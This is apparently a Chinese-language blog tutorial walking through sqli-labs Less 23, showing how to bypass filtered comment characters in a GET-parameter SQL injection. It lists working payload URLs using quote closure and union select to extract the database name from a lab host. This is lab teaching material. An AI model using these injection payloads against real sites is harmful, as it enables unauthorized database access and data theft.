小课堂 -- 绕过去除注释符(Get)

简介: 小课堂 -- 绕过去除注释符(Get)

环境sqli-labs

 

less 23

1、输入?id=1,正常运行

image.png

 

2、输入特殊字符报错

image.png

 

3、单引号闭合,但是发现# --+等都被过滤了

image.png

 

4、使用下面代码闭合

192.168.1.121/sqli/less-23?id=1' or '1'='1

 

5、用union select判断字段数

192.168.1.121/sqli/less-23?id=1' union select 1,2,3 or '1'='1

 

6、让id报错,union select生效

192.168.1.121/sqli/less-23?id=-1' union select 1,2,3 or '1'='1

image.png

 

7、获取数据库名称

192.168.1.121/sqli/less-23?id=-1' union select 1,database(),3 or '1'='1

image.png

 

 

 

禁止非法,后果自负

 

目录
相关文章
|
2月前
|
数据库
19、绕过去除注释符(Get)
19、绕过去除注释符(Get)
15 0
|
2月前
|
SQL 数据库
小课堂 -- 绕过去除特殊字符的sql注入
小课堂 -- 绕过去除特殊字符的sql注入
22 0
|
5月前
|
数据采集 Java 机器人
根据正则表达式截取字串符,这个办法打败99%程序员
作为一名程序员,常常会在以下情况下使用函数功能根据正则表达式截取字符串:
|
3月前
|
Java
java读取txt文件,使用逗号,分号,空格,回车将文件内容分割成一个一个的词组,找出所有重复的词组
java读取txt文件,使用逗号,分号,空格,回车将文件内容分割成一个一个的词组,找出所有重复的词组
94 38
|
8月前
正则表达的的具体方式
正则表达的的具体方式
33 1
|
4月前
|
人工智能 自然语言处理 Java
想要搞定正则验证字串符?用这个办法最简单,质量还高!
在编程中,字符串的处理是不可避免的一部分。我们经常需要验证用户输入的数据、提取文本信息、替换特定字符等等。在这些场景中,正则验证字串符(Regex Validation)为我们提供了一种高效、灵活的处理方式。
|
7月前
|
开发者 Perl
正则表达式中的模式修正符S和M 妙用!
教你如何正确使用正则表达式中的模式修正符S和M!
39 0
正则表达式中的模式修正符S和M 妙用!
|
7月前
|
数据采集 PHP 开发者
|
8月前
|
算法 C语言 数据安全/隐私保护
【C++技能树】快速文本匹配 --正则表达式介绍与C++正则表达式使用
假设要判断一个QQ号是否有效,他必须满足以下三个规则
70 0
|
PHP
PHP字符串学习之怎么去除其他字符,只留下数字
在之前的文章《PHP字符串学习之将字符串分成更小长度的子串》中,我们介绍了分割字符串,将字符串分成更小子串的方法。这次继续PHP字符串的学习与练习,看看如何提取字符串中的数字字符,有需要的可以参考参考~ 本文的主题是:“提取字符串中的数字字符”。例如我们给出下面一个字符串 $str ='0我是123456一段测试的字789符串0'; 如何去除其他字符,只返回由字符串中数字字符组成的子串“01234567890”?下面给大家介绍两种方法:
242 0